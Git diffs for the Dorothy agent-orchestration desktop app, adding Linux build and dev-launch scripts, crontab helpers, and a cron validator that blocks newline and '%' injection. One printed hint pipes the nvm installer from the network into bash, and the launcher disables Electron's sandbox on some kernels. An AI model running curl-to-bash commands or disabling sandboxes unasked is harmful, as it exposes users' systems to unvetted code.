+    const [rangePart, ...steps] = part.split('/');
+
+    // Every step must be a positive number, and a step only qualifies '*' or a
+    // range — cron accepts "1-10/2" and "*/2" but rejects "5/10".
+    if (steps.length > 0) {
+      if (!steps.every(step => /^[1-9]\d*$/.test(step))) return false;
+      if (rangePart !== '*' && !rangePart.includes('-')) return false;
+    }
+
+    if (rangePart === '*') return true;
+    return rangePart.split('-').every(bound => cronToken(bound, spec) !== null);
+  });
+}
+
 /**
- * Whether a string is a safe 5-field cron expression.
+ * Whether a string is a cron schedule that is safe to write to a crontab.
  *
  * Automation and task schedules reach the crontab from MCP tools and stored
  * JSON, neither of which constrains the value. A newline would append arbitrary
- * extra crontab lines, and a malformed expression makes `crontab -` reject the
- * whole file, so both are rejected before anything is written.
+ * extra crontab lines and '%' terminates the command, so both are rejected —
+ * and so is anything `crontab -` itself would refuse, since a rejected file
+ * leaves the schedule saved with no job behind it.
+ *
+ * Named months and weekdays (JAN-DEC, SUN-SAT) and the @-macros are ordinary
+ * cron syntax and are accepted.
  */
 export function isValidCronExpression(expr: string): boolean {
   if (typeof expr !== 'string') return false;
-  // % has a special meaning to cron (it terminates the command and feeds the
-  // rest to stdin); \n and \r would inject whole lines.
   if (/[\n\r%]/.test(expr)) return false;
 
-  const fields = expr.trim().split(/\s+/);
-  if (fields.length !== 5) return false;
+  const trimmed = expr.trim();
+  if (CRON_MACROS.has(trimmed.toLowerCase())) return true;
 
-  const ranges: Array<[number, number]> = [[0, 59], [0, 23], [1, 31], [1, 12], [0, 7]];
-  return fields.every((field, i) => {
-    const [min, max] = ranges[i];
-    return field.split(',').every(part => {
-      const [range, step] = part.split('/');
-      if (step !== undefined && !/^[1-9]\d*$/.test(step)) return false;
-      if (range === '*') return true;
-      const bounds = range.split('-');
-      if (bounds.length > 2) return false;
-      return bounds.every(bound => {
-        if (!/^\d+$/.test(bound)) return false;
-        const value = parseInt(bound, 10);
-        return value >= min && value <= max;
-      });
-    });
-  });
+  const fields = trimmed.split(/\s+/);
+  if (fields.length !== CRON_FIELDS.length) return false;
+
+  return fields.every((field, i) => isValidCronField(field, CRON_FIELDS[i]));
 }

--- a/electron/utils/cron-parser.ts
+++ b/electron/utils/cron-parser.ts
@@ -163,3 +163,38 @@ export function parseCronToPreset(cron: string): ParsedCron {
 
   return result;
 }
+
+/**
+ * Whether a string is a safe 5-field cron expression.
+ *
+ * Automation and task schedules reach the crontab from MCP tools and stored
+ * JSON, neither of which constrains the value. A newline would append arbitrary
+ * extra crontab lines, and a malformed expression makes `crontab -` reject the
+ * whole file, so both are rejected before anything is written.
+ */
+export function isValidCronExpression(expr: string): boolean {
+  if (typeof expr !== 'string') return false;
+  // % has a special meaning to cron (it terminates the command and feeds the
+  // rest to stdin); \n and \r would inject whole lines.
+  if (/[\n\r%]/.test(expr)) return false;
+
+  const fields = expr.trim().split(/\s+/);
+  if (fields.length !== 5) return false;
+
+  const ranges: Array<[number, number]> = [[0, 59], [0, 23], [1, 31], [1, 12], [0, 7]];
+  return fields.every((field, i) => {
+    const [min, max] = ranges[i];
+    return field.split(',').every(part => {
+      const [range, step] = part.split('/');
+      if (step !== undefined && !/^[1-9]\d*$/.test(step)) return false;
+      if (range === '*') return true;
+      const bounds = range.split('-');
+      if (bounds.length > 2) return false;
+      return bounds.every(bound => {
+        if (!/^\d+$/.test(bound)) return false;
+        const value = parseInt(bound, 10);
+        return value >= min && value <= max;
+      });
+    });
+  });
+}

--- a/electron/utils/crontab.ts
+++ b/electron/utils/crontab.ts
@@ -1,0 +1,91 @@
+import { spawn } from 'child_process';
+
+/**
+ * Shared crontab plumbing for the scheduler and for automations.
+ *
+ * Both features register jobs in the same user crontab, so the read/modify/write
+ * cycle and the marker convention live here — a fix applied in one place then
+ * covers both, rather than having to be repeated per caller.
+ *
+ * Every line owned by Dorothy ends in `# <marker>`, and lines are matched by
+ * that exact suffix. Matching on a substring would let one id that is a prefix
+ * of another delete the wrong entry.
+ */
+
+/**
+ * Read the current crontab.
+ *
+ * A user with no crontab is not an error — `crontab -l` exits non-zero and says
+ * so on stderr, and that reads as an empty crontab. Any *other* failure is
+ * reported, because treating it as empty would make the next write replace the
+ * user's real crontab with just our line.
+ */
+export function readCrontab(): Promise<string> {
+  return new Promise((resolve, reject) => {
+    const proc = spawn('crontab', ['-l']);
+    let stdout = '';
+    let stderr = '';
+
+    proc.stdout.on('data', (data) => { stdout += data; });
+    proc.stderr.on('data', (data) => { stderr += data; });
+
+    proc.on('close', (code) => {
+      if (code === 0) {
+        resolve(stdout);
+      } else if (/no crontab/i.test(stderr)) {
+        resolve('');
+      } else {
+        reject(new Error(`crontab -l failed with code ${code}: ${stderr.trim() || 'no output'}`));
+      }
+    });
+    proc.on('error', (err) => reject(new Error(`could not run crontab: ${err.message}`)));
+  });
+}
+
+export function writeCrontab(content: string): Promise<void> {
+  return new Promise((resolve, reject) => {
+    const proc = spawn('crontab', ['-']);
+    let stderr = '';
+
+    proc.stderr.on('data', (data) => { stderr += data; });
+    proc.stdin.write(content);
+    proc.stdin.end();
+
+    proc.on('close', (code) => {
+      if (code === 0) resolve();
+      else reject(new Error(`crontab failed with code ${code}: ${stderr.trim() || 'no output'}`));
+    });
+    proc.on('error', (err) => reject(new Error(`could not run crontab: ${err.message}`)));
+  });
+}
+
+/** Drop the lines Dorothy owns for `marker`, matching the exact `# <marker>` suffix. */
+export function withoutMarkedLines(crontab: string, marker: string): string[] {
+  const suffix = `# ${marker}`;
+  const lines = crontab.split('\n').filter(line => !line.trimEnd().endsWith(suffix));
+  while (lines.length > 0 && lines[lines.length - 1].trim() === '') {
+    lines.pop();
+  }
+  return lines;
+}
+
+export function hasMarkedLine(crontab: string, marker: string): boolean {
+  const suffix = `# ${marker}`;
+  return crontab.split('\n').some(line => line.trimEnd().endsWith(suffix));
+}
+
+/** Serialize crontab lines back to the text `crontab -` expects. */
+export function joinLines(lines: string[]): string {
+  return lines.length > 0 ? lines.join('\n') + '\n' : '';
+}
+
+/**
+ * Replace (or add) the single line Dorothy owns for `marker`.
+ *
+ * `schedule` must already have been checked with isValidCronExpression, and
+ * `command` must be free of newlines — this function assembles the line but
+ * cannot vet its parts.
+ */
+export function markedLine(schedule: string, command: string, marker: string): string {
+  return `${schedule} ${command} # ${marker}`;
+}

--- a/electron/utils/resolve-shell.ts
+++ b/electron/utils/resolve-shell.ts
@@ -1,0 +1,23 @@
+import * as fs from 'fs';
+import * as os from 'os';
+
+/**
+ * Resolve the login shell to spawn.
+ *
+ * SHELL is normally inherited from the desktop session, but an app started from
+ * a .desktop launcher, an AppImage or a systemd user unit often has no SHELL at
+ * all. Falling back to /bin/zsh there fails with ENOENT on most Linux distros,
+ * which ship bash and not zsh.
+ */
+export function resolveShell(): string {
+  const fromEnv = process.env.SHELL;
+  if (fromEnv && fs.existsSync(fromEnv)) {
+    return fromEnv;
+  }
+
+  const fallbacks = os.platform() === 'darwin'
+    ? ['/bin/zsh', '/bin/bash', '/bin/sh']
+    : ['/bin/bash', '/bin/zsh', '/bin/sh'];
+
+  return fallbacks.find(candidate => fs.existsSync(candidate)) || '/bin/sh';
+}

--- a/eslint.config.mjs
+++ b/eslint.config.mjs
@@ -12,6 +12,10 @@ const eslintConfig = defineConfig([
     "out/**",
     "build/**",
     "next-env.d.ts",
+    // Build output. Without these, running lint after a packaging build reports
+    // thousands of problems from bundled third-party code.
+    "release/**",
+    "electron/dist/**",
   ]),
 ]);
 

--- a/package.json
+++ b/package.json
@@ -168,6 +168,7 @@
         "libxtst6",
         "xdg-utils",
         "libatspi2.0-0",
+        "libuuid1",
         "libsecret-1-0"
       ]
     },

--- a/package.json
+++ b/package.json
@@ -6,6 +6,7 @@
   "scripts": {
     "dev": "next dev",
     "dev:network": "next dev -H 0.0.0.0",
+    "dev:linux": "bash scripts/run-linux.sh",
     "build": "next build",
     "start": "next start",
     "lint": "eslint",

--- a/package.json
+++ b/package.json
@@ -161,13 +161,13 @@
     },
     "deb": {
       "depends": [
-        "libgtk-3-0",
+        "libgtk-3-0 | libgtk-3-0t64",
         "libnotify4",
         "libnss3",
         "libxss1",
         "libxtst6",
         "xdg-utils",
-        "libatspi2.0-0",
+        "libatspi2.0-0 | libatspi2.0-0t64",
         "libuuid1",
         "libsecret-1-0"
       ]

--- a/package.json
+++ b/package.json
@@ -16,6 +16,8 @@
     "electron:dev": "concurrently \"npm run dev\" \"npm run electron:start\"",
     "electron:start": "wait-on http://localhost:3000 && tsc -p electron/tsconfig.json && NODE_ENV=development electron .",
     "electron:build": "bash -c 'set -e; mv src/app/api src/app/_api_backup; mv src/app/icon.tsx src/app/_icon_backup.tsx 2>/dev/null || true; trap \"mv src/app/_api_backup src/app/api 2>/dev/null; mv src/app/_icon_backup.tsx src/app/icon.tsx 2>/dev/null\" EXIT; ELECTRON_BUILD=1 next build; tsc -p electron/tsconfig.json; cd mcp-orchestrator && npm install && npm run build && cd ..; cd mcp-telegram && npm install && npm run build && cd ..; cd mcp-kanban && npm install && npm run build && cd ..; cd mcp-vault && npm install && npm run build && cd ..; cd mcp-socialdata && npm install && npm run build && cd ..; cd mcp-x && npm install && npm run build && cd ..; cd mcp-world && npm install && npm run build && cd ..; electron-builder --mac'",
+    "electron:build:linux": "bash scripts/build-linux.sh",
+    "electron:pack:linux": "bash scripts/build-linux.sh --dir",
     "electron:pack": "tsc -p electron/tsconfig.json && cd mcp-orchestrator && npm install && npm run build && cd .. && cd mcp-telegram && npm install && npm run build && cd .. && cd mcp-kanban && npm install && npm run build && cd .. && cd mcp-vault && npm install && npm run build && cd .. && cd mcp-socialdata && npm install && npm run build && cd .. && cd mcp-x && npm install && npm run build && cd .. && cd mcp-world && npm install && npm run build && cd .. && electron-builder --dir --mac"
   },
   "build": {
@@ -115,6 +117,55 @@
       "target": [
         "dmg",
         "zip"
+      ]
+    },
+    "linux": {
+      "category": "Development",
+      "icon": "public/icon-512.png",
+      "executableName": "dorothy",
+      "maintainer": "Charlie85270 <charlie85270@users.noreply.github.com>",
+      "synopsis": "Orchestrate Claude Code, Codex, Gemini and Grok agents",
+      "description": "A desktop app to orchestrate your Claude Code, Codex, Gemini, Grok and local agents. Deploy, monitor, and debug from one interface.",
+      "desktopEntry": {
+        "StartupWMClass": "Dorothy"
+      },
+      "target": [
+        {
+          "target": "AppImage",
+          "arch": [
+            "x64"
+          ]
+        },
+        {
+          "target": "deb",
+          "arch": [
+            "x64"
+          ]
+        },
+        {
+          "target": "rpm",
+          "arch": [
+            "x64"
+          ]
+        },
+        {
+          "target": "tar.gz",
+          "arch": [
+            "x64"
+          ]
+        }
+      ]
+    },
+    "deb": {
+      "depends": [
+        "libgtk-3-0",
+        "libnotify4",
+        "libnss3",
+        "libxss1",
+        "libxtst6",
+        "xdg-utils",
+        "libatspi2.0-0",
+        "libsecret-1-0"
       ]
     },
     "dmg": {

--- a/package.json
+++ b/package.json
@@ -2,6 +2,8 @@
   "name": "dorothy",
   "version": "1.2.9",
   "private": true,
+  "homepage": "https://github.com/Charlie85270/Dorothy",
+  "license": "MIT",
   "main": "electron/dist/main.js",
   "scripts": {
     "dev": "next dev",
@@ -126,8 +128,9 @@
       "maintainer": "Charlie85270 <charlie85270@users.noreply.github.com>",
       "synopsis": "Orchestrate Claude Code, Codex, Gemini and Grok agents",
       "description": "A desktop app to orchestrate your Claude Code, Codex, Gemini, Grok and local agents. Deploy, monitor, and debug from one interface.",
-      "desktopEntry": {
-        "StartupWMClass": "Dorothy"
+      "desktop": {
+        "StartupWMClass": "Dorothy",
+        "Keywords": "claude;agent;ai;orchestration;development;"
       },
       "target": [
         {

--- a/scripts/build-linux.sh
+++ b/scripts/build-linux.sh
@@ -61,6 +61,13 @@ done
 
 [ -d node_modules ] || die "node_modules/ is missing — run 'npm install' first."
 
+# Two builds staging sources at once would move one another's directories around,
+# so hold an exclusive lock for the whole run.
+if command -v flock >/dev/null 2>&1; then
+  exec 9>node_modules/.dorothy-build-linux.lock
+  flock -n 9 || die "another Linux build is already running in this checkout."
+fi
+
 # Next.js cannot statically export API routes, and src/app/icon.tsx conflicts with
 # the packaged icon, so both are moved aside for the duration of the build.
 restore_sources() {
@@ -71,6 +78,27 @@ restore_sources() {
     mv src/app/_icon_backup.tsx src/app/icon.tsx
   fi
 }
+
+# A killed build leaves the sources staged. Put them back before staging again —
+# otherwise "mv src/app/api src/app/_api_backup" nests the routes inside the stale
+# backup and restoring produces src/app/api/api.
+recover_staged_sources() {
+  if [ -d src/app/_api_backup ]; then
+    if [ -d src/app/api ]; then
+      die "both src/app/api and src/app/_api_backup exist — an interrupted build left the tree inconsistent. Reconcile them by hand, then re-run."
+    fi
+    log "Restoring sources staged by an interrupted build..."
+    mv src/app/_api_backup src/app/api
+  fi
+  if [ -f src/app/_icon_backup.tsx ]; then
+    if [ -f src/app/icon.tsx ]; then
+      die "both src/app/icon.tsx and src/app/_icon_backup.tsx exist — an interrupted build left the tree inconsistent. Reconcile them by hand, then re-run."
+    fi
+    mv src/app/_icon_backup.tsx src/app/icon.tsx
+  fi
+}
+
+recover_staged_sources
 
 log "Preparing sources for static export..."
 if [ -d src/app/api ]; then

--- a/scripts/build-linux.sh
+++ b/scripts/build-linux.sh
@@ -1,0 +1,119 @@
+#!/usr/bin/env bash
+#
+# Build Dorothy's Linux distributables with electron-builder.
+#
+#   scripts/build-linux.sh                  All configured targets
+#   scripts/build-linux.sh AppImage deb     Only the named targets
+#   scripts/build-linux.sh --dir            Unpacked build only (fast, for testing)
+#   scripts/build-linux.sh --skip-mcp       Reuse already-built MCP server bundles
+#   scripts/build-linux.sh --help
+#
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+cd "$REPO_ROOT"
+
+MCP_SERVERS=(mcp-orchestrator mcp-telegram mcp-kanban mcp-vault mcp-socialdata mcp-x mcp-world)
+
+SKIP_MCP=0
+DIR_ONLY=0
+TARGETS=()
+
+if [ -t 1 ]; then
+  C_RED=$'\033[31m'; C_BLUE=$'\033[34m'; C_OFF=$'\033[0m'
+else
+  C_RED=''; C_BLUE=''; C_OFF=''
+fi
+
+log() { printf '%s\n' "${C_BLUE}==>${C_OFF} $*"; }
+die() { printf '%s\n' "${C_RED}error:${C_OFF} $*" >&2; exit 1; }
+
+usage() {
+  cat <<'EOF'
+Usage: scripts/build-linux.sh [options] [targets...]
+
+Builds the Next.js static export, compiles the Electron main process, bundles the
+MCP servers, and runs electron-builder for Linux.
+
+Targets:
+  Any electron-builder Linux target (AppImage, deb, rpm, tar.gz). With no target
+  argument, everything listed under build.linux.target in package.json is built.
+
+Options:
+  --dir          Unpacked directory build only — no installers. Much faster.
+  --skip-mcp     Do not reinstall/rebuild the MCP servers; reuse their dist/bundle.js.
+  -h, --help     Show this help.
+
+Output lands in release/.
+EOF
+}
+
+while [ $# -gt 0 ]; do
+  case "$1" in
+    --dir) DIR_ONLY=1 ;;
+    --skip-mcp) SKIP_MCP=1 ;;
+    -h|--help) usage; exit 0 ;;
+    -*) die "unknown option: $1" ;;
+    *) TARGETS+=("$1") ;;
+  esac
+  shift
+done
+
+[ -d node_modules ] || die "node_modules/ is missing — run 'npm install' first."
+
+# Next.js cannot statically export API routes, and src/app/icon.tsx conflicts with
+# the packaged icon, so both are moved aside for the duration of the build.
+restore_sources() {
+  if [ -d src/app/_api_backup ]; then
+    mv src/app/_api_backup src/app/api
+  fi
+  if [ -f src/app/_icon_backup.tsx ]; then
+    mv src/app/_icon_backup.tsx src/app/icon.tsx
+  fi
+}
+
+log "Preparing sources for static export..."
+if [ -d src/app/api ]; then
+  mv src/app/api src/app/_api_backup
+fi
+if [ -f src/app/icon.tsx ]; then
+  mv src/app/icon.tsx src/app/_icon_backup.tsx
+fi
+trap restore_sources EXIT
+
+log "Building the Next.js static export..."
+ELECTRON_BUILD=1 npx next build
+
+log "Compiling the Electron main process..."
+npx tsc -p electron/tsconfig.json
+
+if [ "$SKIP_MCP" -eq 1 ]; then
+  log "Skipping MCP server bundles (--skip-mcp)."
+  for server in "${MCP_SERVERS[@]}"; do
+    [ -f "$server/dist/bundle.js" ] || die "$server/dist/bundle.js is missing — run without --skip-mcp."
+  done
+else
+  for server in "${MCP_SERVERS[@]}"; do
+    log "Bundling ${server}..."
+    ( cd "$server" && npm install && npm run build )
+  done
+fi
+
+restore_sources
+trap - EXIT
+
+log "Running electron-builder..."
+if [ "$DIR_ONLY" -eq 1 ]; then
+  npx electron-builder --linux --dir
+elif [ ${#TARGETS[@]} -gt 0 ]; then
+  npx electron-builder --linux "${TARGETS[@]}"
+else
+  npx electron-builder --linux
+fi
+
+log "Done. Artifacts in release/:"
+shopt -s nullglob
+for artifact in release/*.AppImage release/*.deb release/*.rpm release/*.tar.gz; do
+  printf '  %s  %s\n' "$(du -h "$artifact" | cut -f1)" "$artifact"
+done
+shopt -u nullglob

--- a/scripts/run-linux.sh
+++ b/scripts/run-linux.sh
@@ -139,7 +139,13 @@ check_prerequisites() {
 check_port_free() {
   local busy=0
   if command -v ss >/dev/null 2>&1; then
-    if ss -ltnH 2>/dev/null | awk '{print $4}' | grep -qE "[:.]${DEV_PORT}$"; then
+    # Piping into "grep -q" makes grep exit on the first hit, which kills awk
+    # with SIGPIPE (141); under "set -o pipefail" that becomes the pipeline's
+    # status and a busy port gets reported as free. Capture first, then match
+    # without a pipe. (ss | awk is safe — awk consumes all of its input.)
+    local listening
+    listening=$(ss -ltnH 2>/dev/null | awk '{print $4}' || true)
+    if grep -qE "[:.]${DEV_PORT}$" <<<"$listening"; then
       busy=1
     fi
   elif command -v lsof >/dev/null 2>&1; then

--- a/scripts/run-linux.sh
+++ b/scripts/run-linux.sh
@@ -1,0 +1,307 @@
+#!/usr/bin/env bash
+#
+# Set up and launch Dorothy in development mode on Linux.
+#
+#   scripts/run-linux.sh                 Electron dev mode (default)
+#   scripts/run-linux.sh --web           Browser-only mode on http://localhost:3000
+#   scripts/run-linux.sh --skip-install   Skip dependency install
+#   scripts/run-linux.sh --help
+#
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+cd "$REPO_ROOT"
+
+DEV_PORT=3000
+REBUILD_STAMP="node_modules/.dorothy-electron-rebuild"
+
+SKIP_INSTALL=0
+WEB_MODE=0
+
+if [ -t 1 ]; then
+  C_BOLD=$'\033[1m'; C_RED=$'\033[31m'; C_YELLOW=$'\033[33m'; C_BLUE=$'\033[34m'; C_OFF=$'\033[0m'
+else
+  C_BOLD=''; C_RED=''; C_YELLOW=''; C_BLUE=''; C_OFF=''
+fi
+
+log()  { printf '%s\n' "${C_BLUE}==>${C_OFF} $*"; }
+warn() { printf '%s\n' "${C_YELLOW}warning:${C_OFF} $*" >&2; }
+err()  { printf '%s\n' "${C_RED}error:${C_OFF} $*" >&2; }
+die()  { err "$@"; exit 1; }
+
+usage() {
+  cat <<'EOF'
+Usage: scripts/run-linux.sh [options]
+
+Sets up a Linux checkout of Dorothy and launches it in development mode:
+checks prerequisites, installs dependencies, rebuilds the native modules
+(better-sqlite3, node-pty) against the Electron ABI, then starts the app.
+
+Options:
+  --web            Run browser-only mode (next dev on http://localhost:3000).
+                   Skips Electron and the native-module rebuild.
+  --skip-install   Do not run "npm install" even if dependencies look stale.
+  -h, --help       Show this help.
+
+Notes:
+  * The Electron rebuild is cached with a stamp file
+    (node_modules/.dorothy-electron-rebuild) and only re-runs when the Electron
+    version or the Node ABI changes.
+  * --web leaves the native modules built for the Electron ABI. Nothing under
+    src/ loads them, but a plain "node" script that does would need
+    "npm rebuild better-sqlite3 node-pty" first.
+EOF
+}
+
+while [ $# -gt 0 ]; do
+  case "$1" in
+    --web) WEB_MODE=1 ;;
+    --skip-install) SKIP_INSTALL=1 ;;
+    -h|--help) usage; exit 0 ;;
+    *) err "unknown option: $1"; echo >&2; usage >&2; exit 1 ;;
+  esac
+  shift
+done
+
+# ---------------------------------------------------------------- prerequisites
+
+required_node_major() {
+  local version=22
+  if [ -f .nvmrc ]; then
+    local pinned
+    pinned="$(tr -d '[:space:]v' < .nvmrc)"
+    pinned="${pinned%%.*}"
+    case "$pinned" in ''|*[!0-9]*) ;; *) version="$pinned" ;; esac
+  fi
+  printf '%s' "$version"
+}
+
+check_prerequisites() {
+  local node_major want_major
+  local -a problems=() apt_packages=()
+
+  want_major="$(required_node_major)"
+
+  if command -v node >/dev/null 2>&1; then
+    node_major="$(node -p 'process.versions.node.split(".")[0]' 2>/dev/null || echo 0)"
+    if [ "$node_major" -lt "$want_major" ]; then
+      problems+=("Node.js $(node -v) is too old — Dorothy needs Node >= ${want_major} (see .nvmrc).")
+    fi
+  else
+    problems+=("Node.js is not installed — Dorothy needs Node >= ${want_major} (see .nvmrc).")
+  fi
+
+  if ! command -v npm >/dev/null 2>&1; then
+    problems+=("npm is not installed (it ships with Node.js).")
+  fi
+
+  # better-sqlite3 and node-pty have no prebuilt binaries for the Electron ABI,
+  # so node-gyp compiles them from source here.
+  if ! command -v python3 >/dev/null 2>&1; then
+    problems+=("python3 is not installed — node-gyp needs it to build better-sqlite3 and node-pty.")
+    apt_packages+=("python3")
+  fi
+
+  local -a missing_toolchain=()
+  command -v make >/dev/null 2>&1 || missing_toolchain+=("make")
+  command -v g++ >/dev/null 2>&1 || missing_toolchain+=("g++")
+  if [ ${#missing_toolchain[@]} -gt 0 ]; then
+    problems+=("No C++ toolchain (missing: ${missing_toolchain[*]}) — better-sqlite3 and node-pty compile from source.")
+    apt_packages+=("build-essential")
+  fi
+
+  if [ ${#problems[@]} -eq 0 ]; then
+    return 0
+  fi
+
+  err "missing prerequisites:"
+  local problem
+  for problem in "${problems[@]}"; do
+    printf '  - %s\n' "$problem" >&2
+  done
+  printf '\n' >&2
+  if [ ${#apt_packages[@]} -gt 0 ]; then
+    printf '%s\n' "  On Debian/Ubuntu: ${C_BOLD}sudo apt install -y ${apt_packages[*]}${C_OFF}" >&2
+  fi
+  if ! command -v node >/dev/null 2>&1 || [ "${node_major:-0}" -lt "$want_major" ]; then
+    printf '%s\n' "  Node ${want_major} is not in the Ubuntu/Debian archives — install it with nvm:" >&2
+    printf '%s\n' "    ${C_BOLD}curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.1/install.sh | bash && nvm install ${want_major}${C_OFF}" >&2
+    printf '%s\n' "  or from NodeSource: ${C_BOLD}https://github.com/nodesource/distributions${C_OFF}" >&2
+  fi
+  exit 1
+}
+
+# next dev silently falls back to another port when 3000 is taken, and then
+# "wait-on http://localhost:3000" in electron:dev waits forever.
+check_port_free() {
+  local busy=0
+  if command -v ss >/dev/null 2>&1; then
+    if ss -ltnH 2>/dev/null | awk '{print $4}' | grep -qE "[:.]${DEV_PORT}$"; then
+      busy=1
+    fi
+  elif command -v lsof >/dev/null 2>&1; then
+    if lsof -iTCP:"${DEV_PORT}" -sTCP:LISTEN >/dev/null 2>&1; then
+      busy=1
+    fi
+  else
+    return 0
+  fi
+
+  if [ "$busy" -eq 1 ]; then
+    err "port ${DEV_PORT} is already in use."
+    printf '%s\n' "  Dorothy's dev server must own port ${DEV_PORT}: next dev would fall back to another" >&2
+    printf '%s\n' "  port and the app would never connect. Stop the other server, e.g.:" >&2
+    printf '%s\n' "    ${C_BOLD}fuser -k ${DEV_PORT}/tcp${C_OFF}" >&2
+    exit 1
+  fi
+}
+
+# ------------------------------------------------------------------- install
+
+dependencies_stale() {
+  if [ ! -d node_modules ]; then
+    return 0
+  fi
+  if [ ! -f node_modules/.package-lock.json ]; then
+    return 0
+  fi
+  if [ package-lock.json -nt node_modules/.package-lock.json ] || [ package.json -nt node_modules/.package-lock.json ]; then
+    return 0
+  fi
+  return 1
+}
+
+install_dependencies() {
+  if [ "$SKIP_INSTALL" -eq 1 ]; then
+    if [ ! -d node_modules ]; then
+      die "--skip-install was passed but node_modules/ does not exist. Run without --skip-install first."
+    fi
+    log "Skipping dependency install (--skip-install)."
+    return 0
+  fi
+
+  if dependencies_stale; then
+    log "Installing dependencies (npm install) — this takes a few minutes on a fresh checkout..."
+    npm install
+  else
+    log "Dependencies are up to date."
+  fi
+}
+
+# ------------------------------------------------------- native module rebuild
+
+rebuild_native_modules() {
+  local electron_version node_abi want current
+
+  if [ ! -d node_modules/electron ]; then
+    die "node_modules/electron is missing — run without --skip-install so dependencies get installed."
+  fi
+
+  electron_version="$(node -p "require('electron/package.json').version")"
+  node_abi="$(node -p 'process.versions.modules')"
+  want="electron=${electron_version} node-abi=${node_abi}"
+
+  current=""
+  if [ -f "$REBUILD_STAMP" ]; then
+    current="$(cat "$REBUILD_STAMP")"
+  fi
+
+  if [ "$current" = "$want" ]; then
+    log "Native modules already built for Electron ${electron_version} (stamp: ${REBUILD_STAMP})."
+    return 0
+  fi
+
+  log "Rebuilding better-sqlite3 and node-pty for Electron ${electron_version} — this is slow, but it is cached..."
+  npx @electron/rebuild --force --only better-sqlite3,node-pty
+  printf '%s\n' "$want" > "$REBUILD_STAMP"
+}
+
+# ------------------------------------------------------------ electron sandbox
+
+read_userns_restriction() {
+  local value="" sysctl_bin
+  for sysctl_bin in sysctl /usr/sbin/sysctl /sbin/sysctl; do
+    if command -v "$sysctl_bin" >/dev/null 2>&1; then
+      value="$("$sysctl_bin" -n kernel.apparmor_restrict_unprivileged_userns 2>/dev/null || true)"
+      break
+    fi
+  done
+  if [ -z "$value" ] && [ -r /proc/sys/kernel/apparmor_restrict_unprivileged_userns ]; then
+    value="$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns 2>/dev/null || true)"
+  fi
+  printf '%s' "${value:-0}"
+}
+
+configure_electron_sandbox() {
+  if [ "$(read_userns_restriction)" != "1" ]; then
+    return 0
+  fi
+  export ELECTRON_DISABLE_SANDBOX=1
+  log "kernel.apparmor_restrict_unprivileged_userns=1, so exported ELECTRON_DISABLE_SANDBOX=1: this kernel (Ubuntu 24.04+) blocks unprivileged user namespaces and Electron's sandbox would fail to start without it."
+}
+
+# ------------------------------------------------------------------- launching
+
+CHILD_PID=""
+CLEANED_UP=0
+
+cleanup() {
+  if [ "$CLEANED_UP" -eq 1 ]; then
+    return 0
+  fi
+  CLEANED_UP=1
+  trap - INT TERM EXIT
+
+  if [ -n "$CHILD_PID" ] && kill -0 "$CHILD_PID" 2>/dev/null; then
+    log "Shutting down dev processes..."
+    kill -TERM -"$CHILD_PID" 2>/dev/null || kill -TERM "$CHILD_PID" 2>/dev/null || true
+    local waited=0
+    while [ "$waited" -lt 50 ] && kill -0 "$CHILD_PID" 2>/dev/null; do
+      sleep 0.1
+      waited=$((waited + 1))
+    done
+    kill -KILL -"$CHILD_PID" 2>/dev/null || true
+  fi
+}
+
+launch() {
+  local -a command
+  if [ "$WEB_MODE" -eq 1 ]; then
+    command=(npm run dev)
+    log "Starting browser-only mode — open http://localhost:${DEV_PORT} (Ctrl-C to stop)."
+  else
+    command=(npm run electron:dev)
+    log "Starting Electron dev mode — the window opens once http://localhost:${DEV_PORT} is up (Ctrl-C to stop)."
+  fi
+
+  # Job control puts the child in its own process group so that Ctrl-C tears
+  # down every next/electron process instead of orphaning them.
+  set -m
+  "${command[@]}" < /dev/null &
+  CHILD_PID=$!
+  set +m
+
+  trap cleanup INT TERM EXIT
+
+  local status=0
+  wait "$CHILD_PID" || status=$?
+  cleanup
+
+  # 130/143 mean the user stopped it with Ctrl-C, which is a normal exit.
+  if [ "$status" -eq 130 ] || [ "$status" -eq 143 ]; then
+    status=0
+  fi
+  return "$status"
+}
+
+# ----------------------------------------------------------------------- main
+
+log "Dorothy dev launcher (${REPO_ROOT})"
+check_prerequisites
+check_port_free
+install_dependencies
+if [ "$WEB_MODE" -eq 0 ]; then
+  rebuild_native_modules
+  configure_electron_sandbox
+fi
+launch

--- a/scripts/run-linux.sh
+++ b/scripts/run-linux.sh
@@ -183,6 +183,9 @@ install_dependencies() {
   if dependencies_stale; then
     log "Installing dependencies (npm install) — this takes a few minutes on a fresh checkout..."
     npm install
+    # An install can restore the Node-ABI build of a native module, so the
+    # cached Electron rebuild can no longer be trusted.
+    rm -f "$REBUILD_STAMP"
   else
     log "Dependencies are up to date."
   fi

--- a/scripts/run-linux.sh
+++ b/scripts/run-linux.sh
@@ -95,19 +95,22 @@ check_prerequisites() {
     problems+=("npm is not installed (it ships with Node.js).")
   fi
 
-  # better-sqlite3 and node-pty have no prebuilt binaries for the Electron ABI,
-  # so node-gyp compiles them from source here.
-  if ! command -v python3 >/dev/null 2>&1; then
-    problems+=("python3 is not installed — node-gyp needs it to build better-sqlite3 and node-pty.")
-    apt_packages+=("python3")
-  fi
+  # better-sqlite3 and node-pty have no prebuilt binaries for the Electron ABI, so
+  # node-gyp compiles them from source. That only happens when this run may install
+  # dependencies or rebuild them — "--web --skip-install" compiles nothing.
+  if [ "$SKIP_INSTALL" -eq 0 ] || [ "$WEB_MODE" -eq 0 ]; then
+    if ! command -v python3 >/dev/null 2>&1; then
+      problems+=("python3 is not installed — node-gyp needs it to build better-sqlite3 and node-pty.")
+      apt_packages+=("python3")
+    fi
 
-  local -a missing_toolchain=()
-  command -v make >/dev/null 2>&1 || missing_toolchain+=("make")
-  command -v g++ >/dev/null 2>&1 || missing_toolchain+=("g++")
-  if [ ${#missing_toolchain[@]} -gt 0 ]; then
-    problems+=("No C++ toolchain (missing: ${missing_toolchain[*]}) — better-sqlite3 and node-pty compile from source.")
-    apt_packages+=("build-essential")
+    local -a missing_toolchain=()
+    command -v make >/dev/null 2>&1 || missing_toolchain+=("make")
+    command -v g++ >/dev/null 2>&1 || missing_toolchain+=("g++")
+    if [ ${#missing_toolchain[@]} -gt 0 ]; then
